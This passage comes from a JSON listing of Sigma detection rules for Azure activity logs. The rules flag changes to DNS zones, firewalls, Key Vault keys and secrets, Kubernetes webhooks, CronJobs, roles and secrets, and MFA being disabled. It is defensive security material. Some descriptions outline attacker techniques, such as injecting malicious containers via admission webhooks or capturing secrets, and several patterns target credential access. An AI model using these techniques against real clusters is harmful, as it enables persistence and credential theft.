    "content": "title: Azure DNS Zone Modified or Deleted\nid: af6925b0-8826-47f1-9324-337507a0babd\nstatus: test\ndescription: Identifies when DNS zone is modified or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\nauthor: Austin Songer @austinsonger\ndate: 2021-08-08\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.t1565.001\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName|startswith: 'MICROSOFT.NETWORK/DNSZONES'\n        operationName|endswith:\n            - '/WRITE'\n            - '/DELETE'\n    condition: selection\nfalsepositives:\n    - DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_firewall_modified_or_deleted.yml",
    "content": "title: Azure Firewall Modified or Deleted\nid: 512cf937-ea9b-4332-939c-4c2c94baadcd\nstatus: test\ndescription: Identifies when a firewall is created, modified, or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer @austinsonger\ndate: 2021-08-08\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.NETWORK/AZUREFIREWALLS/WRITE\n            - MICROSOFT.NETWORK/AZUREFIREWALLS/DELETE\n    condition: selection\nfalsepositives:\n    - Firewall being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_firewall_rule_collection_modified_or_deleted.yml",
    "content": "title: Azure Firewall Rule Collection Modified or Deleted\nid: 025c9fe7-db72-49f9-af0d-31341dd7dd57\nstatus: test\ndescription: Identifies when Azure Firewall rule collections (Application, NAT, and Network) are modified or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer @austinsonger\ndate: 2021-08-08\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.NETWORK/AZUREFIREWALLS/APPLICATIONRULECOLLECTIONS/WRITE\n            - MICROSOFT.NETWORK/AZUREFIREWALLS/APPLICATIONRULECOLLECTIONS/DELETE\n            - MICROSOFT.NETWORK/AZUREFIREWALLS/NATRULECOLLECTIONS/WRITE\n            - MICROSOFT.NETWORK/AZUREFIREWALLS/NATRULECOLLECTIONS/DELETE\n            - MICROSOFT.NETWORK/AZUREFIREWALLS/NETWORKRULECOLLECTIONS/WRITE\n            - MICROSOFT.NETWORK/AZUREFIREWALLS/NETWORKRULECOLLECTIONS/DELETE\n    condition: selection\nfalsepositives:\n    - Rule collections (Application, NAT, and Network) may be modified or deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Rule collections modified or deleted by unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_granting_permission_detection.yml",
    "content": "title: Granting Of Permissions To An Account\nid: a622fcd2-4b5a-436a-b8a2-a4171161833c\nstatus: test\ndescription: Detects role assignments (Microsoft.Authorization/roleAssignments/write) that grant users access to Azure resources. The referenced Sentinel query additionally alerts only when the assignment comes from a previously unseen source IP address; this rule matches every assignment, so that baseline has to be applied in the backend.\nreferences:\n    - https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml\nauthor: sawwinnnaung\ndate: 2020-05-07\nmodified: 2023-10-11\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098.003\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    keywords:\n        - Microsoft.Authorization/roleAssignments/write\n    condition: keywords\nfalsepositives:\n    - Valid change\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_keyvault_key_modified_or_deleted.yml",
    "content": "title: Azure Keyvault Key Modified or Deleted\nid: 80eeab92-0979-4152-942d-96749e11df40\nstatus: test\ndescription: Identifies when a Keyvault Key is modified or deleted in Azure.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer @austinsonger\ndate: 2021-08-16\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.credential-access\n    - attack.t1552\n    - attack.t1552.001\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.KEYVAULT/VAULTS/KEYS/UPDATE/ACTION\n            - MICROSOFT.KEYVAULT/VAULTS/KEYS/CREATE\n            - MICROSOFT.KEYVAULT/VAULTS/KEYS/CREATE/ACTION\n            - MICROSOFT.KEYVAULT/VAULTS/KEYS/IMPORT/ACTION\n            - MICROSOFT.KEYVAULT/VAULTS/KEYS/RECOVER/ACTION\n            - MICROSOFT.KEYVAULT/VAULTS/KEYS/RESTORE/ACTION\n            - MICROSOFT.KEYVAULT/VAULTS/KEYS/DELETE\n            - MICROSOFT.KEYVAULT/VAULTS/KEYS/BACKUP/ACTION\n            - MICROSOFT.KEYVAULT/VAULTS/KEYS/PURGE/ACTION\n    condition: selection\nfalsepositives:\n    - Key being modified or deleted may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_keyvault_modified_or_deleted.yml",
    "content": "title: Azure Key Vault Modified or Deleted\nid: 459a2970-bb84-4e6a-a32e-ff0fbd99448d\nstatus: test\ndescription: Identifies when a key vault is modified or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer @austinsonger\ndate: 2021-08-16\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.credential-access\n    - attack.t1552\n    - attack.t1552.001\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.KEYVAULT/VAULTS/WRITE\n            - MICROSOFT.KEYVAULT/VAULTS/DELETE\n            - MICROSOFT.KEYVAULT/VAULTS/DEPLOY/ACTION\n            - MICROSOFT.KEYVAULT/VAULTS/ACCESSPOLICIES/WRITE\n    condition: selection\nfalsepositives:\n    - Key Vault being modified or deleted may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_keyvault_secrets_modified_or_deleted.yml",
    "content": "title: Azure Keyvault Secrets Modified or Deleted\nid: b831353c-1971-477b-abb6-2828edc3bca1\nstatus: test\ndescription: Identifies when secrets are modified or deleted in Azure.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer @austinsonger\ndate: 2021-08-16\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.credential-access\n    - attack.t1552\n    - attack.t1552.001\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.KEYVAULT/VAULTS/SECRETS/WRITE\n            - MICROSOFT.KEYVAULT/VAULTS/SECRETS/DELETE\n            - MICROSOFT.KEYVAULT/VAULTS/SECRETS/BACKUP/ACTION\n            - MICROSOFT.KEYVAULT/VAULTS/SECRETS/PURGE/ACTION\n            - MICROSOFT.KEYVAULT/VAULTS/SECRETS/UPDATE/ACTION\n            - MICROSOFT.KEYVAULT/VAULTS/SECRETS/RECOVER/ACTION\n            - MICROSOFT.KEYVAULT/VAULTS/SECRETS/RESTORE/ACTION\n            - MICROSOFT.KEYVAULT/VAULTS/SECRETS/SETSECRET/ACTION\n    condition: selection\nfalsepositives:\n    - Secrets being modified or deleted may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_kubernetes_admission_controller.yml",
    "content": "title: Azure Kubernetes Admission Controller\nid: a61a3c56-4ce2-4351-a079-88ae4cbd2b58\nstatus: test\ndescription: |\n  Identifies when an admission webhook configuration is created or modified in Azure Kubernetes.\n  A Kubernetes admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\n  The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\n  An adversary can use a MutatingAdmissionWebhook to obtain persistence in the cluster.\n  For example, attackers can intercept and modify pod creation operations in the cluster and add their malicious container to every created pod.\n  An adversary can also use a ValidatingAdmissionWebhook to obtain access credentials.\n  Such a webhook can intercept requests to the API server and record secrets and other sensitive information.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\nauthor: Austin Songer @austinsonger\ndate: 2021-11-25\nmodified: 2022-12-18\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1078\n    - attack.credential-access\n    - attack.t1552\n    - attack.t1552.007\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName|startswith:\n            - 'MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/ADMISSIONREGISTRATION.K8S.IO'\n            - 'MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/ADMISSIONREGISTRATION.K8S.IO'\n        operationName|endswith:\n            - '/MUTATINGWEBHOOKCONFIGURATIONS/WRITE'\n            - '/VALIDATINGWEBHOOKCONFIGURATIONS/WRITE'\n    condition: selection\nfalsepositives:\n    - Admission webhook configurations may be created or modified by a system administrator.\n    - If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_kubernetes_cluster_created_or_deleted.yml",
    "content": "title: Azure Kubernetes Cluster Created or Deleted\nid: 9541f321-7cba-4b43-80fc-fbd1fb922808\nstatus: test\ndescription: Detects when an Azure Kubernetes cluster is created or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\n    - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/\n    - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/\n    - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1\nauthor: Austin Songer @austinsonger\ndate: 2021-08-07\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.t1485\n    - attack.t1496\n    - attack.t1489\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/WRITE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/DELETE\n    condition: selection\nfalsepositives:\n    - Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Kubernetes cluster created or deleted by unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_kubernetes_cronjob.yml",
    "content": "title: Azure Kubernetes CronJob\nid: 1c71e254-6655-42c1-b2d6-5e4718d7fc0a\nstatus: test\ndescription: |\n  Identifies when an Azure Kubernetes CronJob or Job is created or modified. A Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\n  Kubernetes Jobs can be used to run containers that perform finite tasks for batch processing. A Kubernetes CronJob is used to schedule Jobs.\n  An adversary may use a Kubernetes CronJob to schedule execution of malicious code that would run as a container in the cluster.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\n    - https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/\n    - https://kubernetes.io/docs/concepts/workloads/controllers/job/\n    - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/\nauthor: Austin Songer @austinsonger\ndate: 2021-11-22\nmodified: 2022-12-18\ntags:\n    - attack.persistence\n    - attack.t1053.003\n    - attack.privilege-escalation\n    - attack.execution\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName|startswith:\n            - 'MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/BATCH'\n            - 'MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/BATCH'\n        operationName|endswith:\n            - '/CRONJOBS/WRITE'\n            - '/JOBS/WRITE'\n    condition: selection\nfalsepositives:\n    - Azure Kubernetes CronJobs/Jobs may be created or modified by a system administrator.\n    - If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_kubernetes_events_deleted.yml",
    "content": "title: Azure Kubernetes Events Deleted\nid: 225d8b09-e714-479c-a0e4-55e6f29adf35\nstatus: test\ndescription: Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\n    - https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml\nauthor: Austin Songer @austinsonger\ndate: 2021-07-24\nmodified: 2022-08-23\ntags:\n    - attack.defense-evasion\n    - attack.t1562\n    - attack.t1562.001\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE\n    condition: selection\nfalsepositives:\n    - Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Event deletions by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_kubernetes_network_policy_change.yml",
    "content": "title: Azure Kubernetes Network Policy Change\nid: 08d6ac24-c927-4469-b3b7-2e422d6e3c43\nstatus: test\ndescription: Identifies when an Azure Kubernetes network policy is modified or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\n    - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/\n    - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/\n    - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1\nauthor: Austin Songer @austinsonger\ndate: 2021-08-07\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.credential-access\n    - attack.t1485\n    - attack.t1496\n    - attack.t1489\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/WRITE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/DELETE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/WRITE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/DELETE\n    condition: selection\nfalsepositives:\n    - Network Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Network Policy modified or deleted by unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_kubernetes_pods_deleted.yml",
    "content": "title: Azure Kubernetes Pods Deleted\nid: b02f9591-12c3-4965-986a-88028629b2e1\nstatus: test\ndescription: Identifies the deletion of Azure Kubernetes Pods.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\n    - https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml\nauthor: Austin Songer @austinsonger\ndate: 2021-07-24\nmodified: 2022-08-23\ntags:\n    - attack.impact\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE\n    condition: selection\nfalsepositives:\n    - Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Pod deletions by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_kubernetes_role_access.yml",
    "content": "title: Azure Kubernetes Sensitive Role Access\nid: 818fee0c-e0ec-4e45-824e-83e4817b0887\nstatus: test\ndescription: Identifies when ClusterRoles/Roles are being modified, deleted, bound or escalated.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\n    - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/\n    - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/\n    - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1\nauthor: Austin Songer @austinsonger\ndate: 2021-08-07\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.t1485\n    - attack.t1496\n    - attack.t1489\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/WRITE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/DELETE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/BIND/ACTION\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/ESCALATE/ACTION\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/WRITE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/DELETE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/BIND/ACTION\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/ESCALATE/ACTION\n    condition: selection\nfalsepositives:\n    - ClusterRoles/Roles being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - ClusterRoles/Roles modification by unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_kubernetes_rolebinding_modified_or_deleted.yml",
    "content": "title: Azure Kubernetes RoleBinding/ClusterRoleBinding Modified or Deleted\nid: 25cb259b-bbdc-4b87-98b7-90d7c72f8743\nstatus: test\ndescription: Detects the creation, patching or deletion of a potentially malicious RoleBinding/ClusterRoleBinding.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\n    - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/\n    - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/\n    - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1\nauthor: Austin Songer @austinsonger\ndate: 2021-08-07\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.credential-access\n    - attack.t1485\n    - attack.t1496\n    - attack.t1489\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/WRITE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/DELETE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/WRITE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/DELETE\n    condition: selection\nfalsepositives:\n    - RoleBinding/ClusterRoleBinding being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - RoleBinding/ClusterRoleBinding modification by unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_kubernetes_secret_or_config_object_access.yml",
    "content": "title: Azure Kubernetes Secret or Config Object Access\nid: 7ee0b4aa-d8d4-4088-b661-20efdf41a04c\nstatus: test\ndescription: Identifies when a Kubernetes account creates, modifies or deletes sensitive objects such as ConfigMaps or Secrets.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\n    - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/\n    - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/\n    - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1\nauthor: Austin Songer @austinsonger\ndate: 2021-08-07\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.t1485\n    - attack.t1496\n    - attack.t1489\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/WRITE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/DELETE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/WRITE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/DELETE\n    condition: selection\nfalsepositives:\n    - Sensitive objects may be modified or deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects modified or deleted by unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_kubernetes_service_account_modified_or_deleted.yml",
    "content": "title: Azure Kubernetes Service Account Modified or Deleted\nid: 12d027c3-b48c-4d9d-8bb6-a732200034b2\nstatus: test\ndescription: Identifies when a service account is modified or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\n    - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/\n    - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/\n    - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1\nauthor: Austin Songer @austinsonger\ndate: 2021-08-07\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.t1531\n    - attack.t1485\n    - attack.t1496\n    - attack.t1489\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/WRITE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/DELETE\n            - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/IMPERSONATE/ACTION\n    condition: selection\nfalsepositives:\n    - Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_mfa_disabled.yml",
    "content": "title: Disabled MFA to Bypass Authentication Mechanisms\nid: 7ea78478-a4f9-42a6-9dcd-f861816122bf\nstatus: test\ndescription: Detects when multi-factor authentication has been disabled for a user, which might indicate malicious activity to bypass authentication mechanisms.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates\nauthor: '@ionsor'\ndate: 2022-02-08\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.persistence\n    - attack.t1556\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        eventSource: AzureActiveDirectory\n        eventName: 'Disable Strong Authentication.'\n        status: success\n    condition: selection\nfalsepositives:\n    - Authorized modification by administrators\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_network_firewall_policy_modified_or_deleted.yml",
    "content": "title: Azure Network Firewall Policy Modified or Deleted\nid: 83c17918-746e-4bd9-920b-8e098bf88c23\nstatus: test\ndescription: Identifies when a Firewall Policy is Modified or Deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer @austinsonger\ndate: 2021-09-02\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.defense-evasion\n    - attack.t1562.007\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.NETWORK/FIREWALLPOLICIES/WRITE\n            - MICROSOFT.NETWORK/FIREWALLPOLICIES/JOIN/ACTION\n            - MICROSOFT.NETWORK/FIREWALLPOLICIES/CERTIFICATES/ACTION\n            - MICROSOFT.NETWORK/FIREWALLPOLICIES/DELETE\n    condition: selection\nfalsepositives:\n    - Firewall Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_network_firewall_rule_modified_or_deleted.yml",
    "content": "title: Azure Firewall Rule Configuration Modified or Deleted\nid: 2a7d64cf-81fa-4daf-ab1b-ab80b789c067\nstatus: test\ndescription: Identifies when a Firewall Rule Configuration is Modified or Deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer @austinsonger\ndate: 2021-08-08\nmodified: 2022-08-23\ntags:\n    - attack.impact\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/WRITE\n            - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/DELETE\n            - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/WRITE\n            - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/DELETE\n    condition: selection\nfalsepositives:\n    - Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_network_p2s_vpn_modified_or_deleted.yml",
    "content": "title: Azure Point-to-site VPN Modified or Deleted\nid: d9557b75-267b-4b43-922f-a775e2d1f792\nstatus: test\ndescription: Identifies when a Point-to-site VPN is Modified or Deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer @austinsonger\ndate: 2021-08-08\nmodified: 2022-08-23\ntags:\n    - attack.impact\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.NETWORK/P2SVPNGATEWAYS/WRITE\n            - MICROSOFT.NETWORK/P2SVPNGATEWAYS/DELETE\n            - MICROSOFT.NETWORK/P2SVPNGATEWAYS/RESET/ACTION\n            - MICROSOFT.NETWORK/P2SVPNGATEWAYS/GENERATEVPNPROFILE/ACTION\n            - MICROSOFT.NETWORK/P2SVPNGATEWAYS/DISCONNECTP2SVPNCONNECTIONS/ACTION\n            - MICROSOFT.NETWORK/P2SVPNGATEWAYS/PROVIDERS/MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/WRITE\n    condition: selection\nfalsepositives:\n    - Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_network_security_modified_or_deleted.yml",
